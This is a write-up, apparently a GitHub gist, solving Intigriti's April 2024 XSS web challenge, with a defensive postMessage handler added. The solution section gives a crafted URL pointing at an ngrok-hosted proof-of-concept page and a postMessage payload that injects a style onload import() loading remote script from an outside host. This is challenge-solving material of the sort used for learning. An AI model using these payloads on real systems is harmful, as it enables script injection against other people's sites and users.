@Siss3l
Last active April 18, 2024 01:43
Intigriti's April 2024 Web Challenge thanks to @kiredevsandhacks

Intigriti April Challenge

  • Category: Web
  • Impact: Medium
  • Solves: 12

Challenge

Description

Find a way to execute alert(document.domain) on the challenge page.

The solution:

  • should leverage a cross site scripting vulnerability on this domain;
  • should execute alert(document.domain);
  • should not be self-XSS or related to MiTM attacks;
  • should not use another challenge on the intigriti.io domain;
  • should require no user interaction.

Overview

We have a web game challenge where we can frantically spam our spacebar key:

<html>
  <head>
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Test Your Race Condition!</title>
  </head>
  <body style="padding:40px;">
    <h1>Test Your Race Condition!</h1>
    <section>Welcome to this gaming page! How fast are you in all games?</section><br>
    <section>
      We currently have just one game but more are in development. Check out the first game:
      <a id="gameLink" href="https://admin:debug@challenge-0424.intigriti.io/private/play.html?gameId=/challenge/game_barspacer.html">BarSpacer</a>!
    </section>
    <br>
    <section>
      If you are a developer, please check out <a href="/challenge/docs.html">the docs</a> for instructions on how to integrate your games with this website.
    </section><br>
    <section id="debug" style="display:none;">Get our server side code here (PW: intigriti):<a id="codeLink" href="/code.zip">code</a></section>
    <script>
      // our backend guys wanted to secure this but who cares about bots and hackers just add this in, until they complain
      if (decodeURIComponent(document.URL).indexOf('debug=true') !== -1) {
        codeLink.href = 'https://admin:debug@' + location.host + codeLink.pathname;
        debug.style.display = null;
      }
      gameLink.href = 'https://admin:debug@' + location.host + gameLink.pathname + '?' + gameLink.href.split('?')[1];
    </script>
  </body>
</html>

A wget command won't produce anything interesting, except for the "Sorry, this app is optimized for Chromium based browser." message.

Resolution

We can take inspiration from the title, previous Intigriti challenges and some fuzzing to find a way to get there quickly.

The given errors are fairly self-explanatory so we won't dwell much on them:

https://admin:debug:%3fdebug=true&gameId=%2f%2fip.ngrok-free.app%2Fpoc.htm&1%23@challenge-0424.intigriti.io/private/play.html?gameId=/challenge/game_debug.html#@challenge-0424.intigriti.io/private/play.html?

The top.postMessage method safely enables cross-origin communication between objects, between a page and a pop-up that it spawned or between a page and an iframe embedded within it.

Therefore we launch our Ngrok-python wrapper followed by the python -m http.server 1234 command to serve our payload (having regard to the above code) and get the alert popup:

<body><script>top.postMessage({nextGameId:"//challenge-0424.intigriti.io/challenge/game_debug.html#",action:"gotoNextGame"},"*");top.postMessage({nextGameId:"%</textarea><style/onload=import(/\\nj.rs/)>",action:"gotoNextGame"},"*");</script></body>

Defense

Avoid using JavaScript.
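A less tongue-in-cheek defense is to make the receiving page distrust postMessage input. The handler below is an added example written for this writeup; it is not the challenge's or Intigriti's code, and the origin constant, the /challenge/ prefix and the function names (isTrustedGameMessage, resolveGameId, handleGameMessage) are assumptions. It checks event.origin instead of accepting messages from any sender, and it constrains nextGameId to a same-origin game file before it is ever used for navigation, so protocol-relative URLs, path traversal and HTML fragments like the second message above are all dropped.

```javascript
// Added example (not the challenge's own code): a hardened receiver for the
// "gotoNextGame" message abused in the writeup. Origin and prefix are assumed.
const TRUSTED_ORIGIN = "https://challenge-0424.intigriti.io"; // assumed deployment origin
const GAME_PREFIX = "/challenge/";                            // assumed game directory

// Accept only well-formed messages that come from the trusted origin.
function isTrustedGameMessage(origin, data) {
  if (origin !== TRUSTED_ORIGIN) return false;
  if (data === null || typeof data !== "object") return false;
  if (data.action !== "gotoNextGame") return false;
  return typeof data.nextGameId === "string";
}

// Resolve nextGameId to a same-origin game path, or null if it is unsafe.
// Protocol-relative values ("//other-host/..."), absolute URLs on other
// origins, "..", query strings, fragments and non-HTML names are rejected.
function resolveGameId(nextGameId) {
  let url;
  try {
    // Resolving against the trusted origin normalises "..", "//host" and "\".
    url = new URL(nextGameId, TRUSTED_ORIGIN);
  } catch {
    return null;
  }
  if (url.origin !== TRUSTED_ORIGIN) return null;
  if (url.search !== "" || url.hash !== "") return null;
  if (!url.pathname.startsWith(GAME_PREFIX)) return null;
  // Only a single lowercase .html file name directly under the prefix.
  const name = url.pathname.slice(GAME_PREFIX.length);
  if (!/^[a-z0-9_]+\.html$/.test(name)) return null;
  return url.pathname;
}

// Combine both checks: returns the path to navigate to, or null to ignore.
function handleGameMessage(origin, data) {
  if (!isTrustedGameMessage(origin, data)) return null;
  return resolveGameId(data.nextGameId);
}

// Wire the handler up in a browser; this branch is skipped under Node.
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const target = handleGameMessage(event.origin, event.data);
    if (target === null) return; // drop anything that failed validation
    // Navigate via the URL API; never concatenate the value into innerHTML.
    location.assign(new URL(target, TRUSTED_ORIGIN).href);
  });
}
```

The two checks are deliberately separate: the origin check stops arbitrary third-party pages from driving the game at all, while the path check limits what a message from a legitimate sender can do, which also covers a compromised or XSS-affected page on the same origin.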

Appendix

A great way to brush up our classics! (Confer https://twitter.com/intigriti/status/1780264966752272625 for other great solutions)

Bye
